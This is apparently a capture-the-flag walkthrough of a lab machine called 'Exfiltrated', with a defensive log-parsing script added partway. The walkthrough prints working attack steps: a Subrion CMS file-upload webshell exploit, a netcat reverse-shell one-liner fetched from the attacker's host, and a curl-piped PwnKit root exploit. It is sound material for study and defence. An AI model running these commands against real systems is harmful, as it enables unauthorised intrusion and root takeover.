Exfiltrated
Intro
Initial Foothold
# Nmap 7.94SVN scan initiated Fri Mar 29 10:17:34 2024 as: nmap -sC -sV -vv -oA nmap/initial exfiltrated.pg
Nmap scan report for exfiltrated.pg (192.168.172.163)
Host is up, received echo-reply ttl 61 (0.041s latency).
Scanned at 2024-03-29 10:17:34 CDT for 9s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
| 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 10:17:43 2024 -- 1 IP address (1 host up) scanned in 8.90 seconds
Open Ports
22/tcp - OpenSSH 8.2p1 Ubuntu
80/tcp - Apache httpd 2.4.41 Ubuntu
80/tcp is running Subrion CMS v4.2.1
Subrion v4.2.1 exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt
Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) | php/webapps/51110.txt
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploiting the Subrion arbitrary file upload to drop a webshell
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: EKdNpVdsAO86ja8qWK4lLk86aPWmAYMUMstEDunx
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: fjzvjyelbvdklzs
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/fjzvjyelbvdklzs.phar
$ whoami
www-data
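An added defender-side example, not part of the original writeup: parse Apache combined-format access-log lines and flag successful requests for PHP-executable files under /panel/uploads/, the artifact this upload bypass leaves behind. The log lines and client IPs are constructed; the .phar path mirrors the webshell path shown above.

```python
import re
from collections import defaultdict

# Constructed sample Apache combined-format lines (not from the original page);
# the .phar path mirrors the webshell path shown above.
SAMPLE_LOG = """\
192.168.45.197 - - [29/Mar/2024:10:25:01 -0500] "POST /panel/login/ HTTP/1.1" 302 412 "-" "python-requests/2.31.0"
192.168.45.197 - - [29/Mar/2024:10:25:03 -0500] "GET /panel/uploads/fjzvjyelbvdklzs.phar HTTP/1.1" 200 20 "-" "python-requests/2.31.0"
192.168.45.197 - - [29/Mar/2024:10:25:09 -0500] "GET /panel/uploads/fjzvjyelbvdklzs.phar?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Mar/2024:10:26:00 -0500] "GET /panel/uploads/logo.png HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Mar/2024:10:26:02 -0500] "GET /subrion/linpeas-output.txt HTTP/1.1" 200 50000 "-" "curl/8.4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Extensions Ubuntu's mod-php handler (FilesMatch .ph(ar|p|tml)) executes; .phar is the one used above.
EXEC_EXT = (".php", ".phar", ".phtml")
UPLOAD_DIR = "/panel/uploads/"

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_webshell_hit(entry):
    """True when an executable-extension file under the upload directory
    was requested and served with a 2xx status."""
    path = entry["path"].split("?", 1)[0].lower()
    return (path.startswith(UPLOAD_DIR)
            and path.endswith(EXEC_EXT)
            and entry["status"].startswith("2"))

def find_webshell_hits(log_text):
    """Group suspicious request paths by client IP."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        e = parse_line(line)
        if e and is_webshell_hit(e):
            hits[e["ip"]].append(e["path"])
    return dict(hits)

if __name__ == "__main__":
    for ip, paths in find_webshell_hits(SAMPLE_LOG).items():
        print(f"{ip}: {len(paths)} hit(s) on executable files under {UPLOAD_DIR}")
        for p in paths:
            print("   ", p)
```

The same check is the basis for a mitigation: an upload directory that serves only static files should have the PHP handler disabled for it, so the .phar request above would not have returned a 200 with command output.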
Download and run linpeas, then copy the output into the web root so it can be fetched from the Kali box
$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh
$ ls /tmp/
linpeas.sh
$ sh /tmp/linpeas.sh > /tmp/linpeas-output.txt
$ cp /tmp/linpeas-output.txt /var/www/html/subrion/
Get Reverse Shell
$ which nc
/usr/bin/nc
$ wget http://192.168.45.197:8000/ncrev.sh -O /tmp/ncrev.sh
$ sh /tmp/ncrev.sh
Contents of reverse shell script
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ cat ncrev.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.197 80 >/tmp/f
Listener catching the shell
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ sudo nc -lvnp 80
[sudo] password for joe:
listening on [any] 80 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.172.163] 47826
sh: 0: can't access tty; job control turned off
$ whoami
www-data
Privilege Escalation
Linpeas output suggests PwnKit (CVE-2021-4034)
Running PwnKit exploit to escalate to root
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@exfiltrated:/var/www/html/subrion/uploads$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@exfiltrated:/var/www/html/subrion/uploads# whoami
whoami
root
root@exfiltrated:/var/www/html/subrion/uploads# cat /root/proof.txt
cat /root/proof.txt
0d8a7229bdcfd3cf3bd4d86216f5e931